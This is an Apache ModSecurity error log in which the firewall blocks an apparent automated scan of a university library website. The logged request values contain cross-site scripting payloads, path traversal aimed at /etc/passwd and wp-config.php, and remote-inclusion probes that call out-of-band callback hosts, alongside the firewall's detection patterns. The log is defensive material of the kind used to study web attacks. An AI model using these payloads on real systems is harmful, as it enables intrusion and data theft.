[Tue Aug 29 11:55:38.658714 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:q: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16SsCo-f0AAAq3a58AAAAI"]
[Tue Aug 29 11:55:39.725645 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:subpage: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/WebMstr7/servlet/mstrWeb"] [unique_id "ZO16S8Co-f0AAAqTvvwAAAAa"]
[Tue Aug 29 11:55:40.176748 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:svpnlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within REQUEST_COOKIES:svpnlang: <script>alert('document.domain')</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wnm/login/login.json"] [unique_id "ZO16TMCo-f0AAAoz8JwAAAAS"]
[Tue Aug 29 11:55:41.987460 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:link_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:link_url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/Ajax_url_encode.php"] [unique_id "ZO16TcCo-f0AAAqSwygAAAAN"]
[Tue Aug 29 11:55:43.717118 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:port. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:port: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/fw/syslogViewer.do"] [unique_id "ZO16T8Co-f0AAAqSwysAAAAN"]
[Tue Aug 29 11:55:44.031950 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(1337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/sell-media-search/"] [unique_id "ZO16UMCo-f0AAAqeFaQAAAAx"]
[Tue Aug 29 11:55:44.545559 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:cid: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/component/music/album.html"] [unique_id "ZO16UMCo-f0AAAq@sXwAAAAM"]
[Tue Aug 29 11:55:44.648487 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nodatamsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nodatamsg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html"] [unique_id "ZO16UMCo-f0AAAq@sYAAAAAM"]
[Tue Aug 29 11:55:45.792017 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UcCo-f0AAAq@sYoAAAAM"]
[Tue Aug 29 11:55:46.579536 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16UsCo-f0AAAqTvx0AAAAa"]
[Tue Aug 29 11:55:46.668711 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login[password]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:login[password]: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/appliance/login.ns"] [unique_id "ZO16UsCo-f0AAAqTvyAAAAAa"]
[Tue Aug 29 11:55:46.684071 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/printenv.shtml"] [unique_id "ZO16UsCo-f0AAAq5@FoAAAAK"]
[Tue Aug 29 11:55:46.688163 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UsCo-f0AAAq@sZcAAAAM"]
[Tue Aug 29 11:55:47.592304 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/shib_logout.php"] [unique_id "ZO16U8Co-f0AAAqeFboAAAAx"]
[Tue Aug 29 11:55:48.677543 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/ssi/printenv.shtml"] [unique_id "ZO16VMCo-f0AAAqSw00AAAAN"]
[Tue Aug 29 11:55:48.698870 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/ilias/shib_logout.php"] [unique_id "ZO16VMCo-f0AAAolKxMAAAAe"]
[Tue Aug 29 11:55:51.797661 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16V8Co-f0AAApbUpYAAAAh"]
[Tue Aug 29 11:55:52.138976 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb07gs6ry9nzawmp.oast.site found within TX:1: cjmnijtjmimvgniikdb07gs6ry9nzawmp.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/umbraco/BackOffice/Api/Help/GetContextHelpForPage"] [unique_id "ZO16WMCo-f0AAAqY6LcAAAAr"]
[Tue Aug 29 11:55:52.255684 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x5c\\x22 onfocus=alert(document.domain); autofocus \\x5c\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO16WMCo-f0AAAqY6L0AAAAr"]
[Tue Aug 29 11:55:52.535484 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0x1nu5898uopqk.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0x1nu5898uopqk.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent"] [unique_id "ZO16WMCo-f0AAApbUqcAAAAh"]
[Tue Aug 29 11:55:53.576558 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb06dh9br5g5sqph.oast.site/ found within TX:1: cjmnijtjmimvgniikdb06dh9br5g5sqph.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss"] [unique_id "ZO16WcCo-f0AAAolKykAAAAe"]
[Tue Aug 29 11:55:53.583636 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:plugin: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/whizz/plugins/delete-plugin.php"] [unique_id "ZO16WcCo-f0AAAqY6MAAAAAr"]
[Tue Aug 29 11:55:53.924517 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:msgId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')// found within ARGS:msgId: ';alert('document.domain')//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/carbon/admin/login.jsp"] [unique_id "ZO16WcCo-f0AAArC7aoAAAAW"]
[Tue Aug 29 11:55:53.948434 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:bgColor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:bgColor: _000000\\x22onload=\\x22prompt(1)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/Telerik.ReportViewer.axd"] [unique_id "ZO16WcCo-f0AAAq4fZQAAAAJ"]
[Tue Aug 29 11:55:55.721041 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO16W8Co-f0AAAqTvz0AAAAa"]
[Tue Aug 29 11:55:56.595944 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: ax6zt\\x22><script>alert(document.domain)</script>y6uu6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO16XMCo-f0AAArC7bgAAAAW"]
[Tue Aug 29 11:55:56.661074 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XMCo-f0AAApbUrkAAAAh"]
[Tue Aug 29 11:55:57.601297 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZO16XcCo-f0AAArC7cAAAAAW"]
[Tue Aug 29 11:55:58.697782 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO16XsCo-f0AAApbUsMAAAAh"]
[Tue Aug 29 11:55:58.762242 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:p: <img src onerror=alert(/XSS/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XsCo-f0AAAqTv0wAAAAa"]
[Tue Aug 29 11:56:00.083951 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:wpbase: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/sourceafrica/js/window.php"] [unique_id "ZO16YMCo-f0AAAq@sc8AAAAM"]
